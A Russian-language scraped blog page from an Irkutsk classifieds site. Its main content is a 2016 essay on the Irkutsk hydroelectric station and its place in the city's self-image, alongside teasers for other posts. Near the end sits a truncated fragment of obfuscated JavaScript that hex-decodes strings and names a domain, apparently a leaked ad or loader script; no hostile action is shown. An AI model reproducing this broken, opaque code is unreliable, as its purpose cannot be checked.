Иркутские объявления Новое в иркутских объявлениях:
БЛОГИ
  • Только хорошие новости: самые красивые деревни в Бурятии, открытие колеса обозрения в Ангарске и выставка роботов в 130-м квартале

    Сегодня грустный день, траур по погибшим в наводнении. Скорбим всем сердцем и не теряем веру в то, что пропавшие без вести найдутся живыми. Ещё очень хочется думать, что из этого происшествия все извлекут урок, и подобное больше не повторится. И хотя настроение в душе глубоко минорное, хочу предложить несколько экспресс-методов, как его приблизить к верхней планке. Признавайтесь: вы уже пробовали в этом году арбуз? А дыню? Я рискнула и не разочаровалась. Сладкие, ароматные… бегите скорее за ними и наслаждайтесь вкусом лета. Теперь – к купанию. Окунались в жаркий день в прохладную водицу? Ещё нет? Тогда надо срочно исправлять, к тому же погода в ближайшие дни по-прежнему будет тёплая. Ещё устраивайте чаще встречи с друзьями. Они, конечно, всегда заняты, да и вы (что кривить душой?) тоже, но всё-таки найдите время. Знайте: встречи со старыми друзьями – бесценны. Наконец, просто высыпайтесь. Здоровый сон – отличное настроение и бодрость на весь день! А теперь – к хорошим новостям!

Иркутская ГЭС: не от града сего

Автор: Сергей ШМИДТ, Langobard   
03.05.2016 09:04

Куда водить в городе И. гостей города? Если речь идет о настоящих туристах, то этот вопрос – не вопрос. Для них давно уже придуманы маршруты для движения и объекты для посещения. А вот когда приезжают твои знакомые или друзья, которым интересен какой-то альтернативный туризму Иркутск, тогда вопросом этим задаться не грех. У каждого конечно свой комплекс маршрутов и объектов для «близких приезжих». Давно подметил, что иркутяне, которым я рассказываю о своем комплексе, более всего удивляются наличию в нем Иркутской ГЭС. А этот элемент города для меня один из самых главных.

Гидроэлектростанции со своими неизбежными водохранилищами и затоплениями гигантских территорий безжалостно губят природу. Однако, удивительное дело, но ни один из технических объектов не встраивается в природу столь непротиворечиво, как все те же гидроэлектростанции. Создавая искусственную продолжительную водную гладь, они своей уничтожившей множество ландшафтов водой добавляют больше воздуха, спокойствия и величия сибирским красотам, которые всегда напоминали мне этакую Брунгильду, почему-то работающую замарашкой Золушкой у злых родственников.

Иркутская ГЭС была спроектирована и построена в 1950-е. В Иркутске это один из важнейших мостков, соединяющих две знаковые для истории нашего отечества эпохи – душный сталинизм и веселящуюся оттепель. Совершенно «оттепельные» герои написанной драматургом А. Арбузовым в 1959 году пьесы «Иркутская история» работают на строительстве Иркутской ГЭС. Замечу, что пьесу можно занести в число полузабытых, но словосочетание «Иркутская история» это один из популярных мемов в Иркутске. Есть песня с таким названием и такими словами в припеве, так называется один из ресторанов в самом центре города.

Иркутская ГЭС, ставшая первой крупной гидроэлектростанцией в Сибири, не так уж и долго пробыла в статусе сибирского водноэлектрического чемпиона. В течение одного-двух десятилетий появились в Сибири другие, более мощные ГЭС, одной из которых даже удалось наладить конструктивный диалог с Египетской пирамидой (см. поэму Е.А. Евтушенко «Братская ГЭС»). Иркутской ГЭС, благодаря скромности своих масштабов (если судить по установившимся в Сибири канонам), удалось превратиться в этакую «городскую ГЭС».

Так вот особенно интересен тот момент, что Иркутская ГЭС – этот развалившийся между берегами Ангары гоповатый великан-недоросток, сплевывающий сквозь зубы пенящуюся слюну – как бы «не от города сего». Город любит воображать себя мещанским, купеческим, интеллигентным, каким угодно, только не индустриальным. К тому же в 1990-е город пережил что-то вроде деиндустриализации, любой индустриальный объект кажется в нем немного лишним и ГЭС тут не исключение. Этой своей инаковостью по отношению к иркутскому городскому стилю самопрезентации и самоомысления ГЭС и интересна.

В городе есть несколько мест с хорошим видом на ГЭС. Много раз обращал внимание, что находясь в этих местах, люди постоянно отвлекаются от общения, оборачиваются к ней, невольно возвращаются к ней взглядами. И уходя, обязательно напоследок смотрят на нее, словно прощаясь – две-три минуты, не меньше.


  • Фигуры умолчания
    Врубил пару дней назад в интернетике умиротворяющий сериал «Аббатство Даунтон», давно собирался проверить, как там во втором сезоне развиваются многочисленные «светлые любови» – между слугами, работающими в роскошном английском поместье, между представителями высшего класса британского общества, и пара-тройка предосудительных межклассовых отношений. С удивлением обнаружил, что «Аббатство» пополнилось новыми персонажами. С интернет-страницы, на которой я смотрю сей сериал, на меня, например, смотрела возможно слегка помятая фотошопом физиономия губернатора Иркутской области С.Г. Левченко. Кроме того, оттуда же на меня лукаво посматривал томящийся в застенках лесной министр Приангарья Сергей Шеверда. Среди фоток героев британского сериала расположились фотки других представителей правящей в области «красной династии» и обслуживающего её чиновного сословия. Каждая фотка сопровождалась ссылкой, ведущей к разоблачениям безобразий и злодейств этих персонажей.  

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "irktorgnews.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

 

БайкалИНФОРМ - Объявления в Иркутске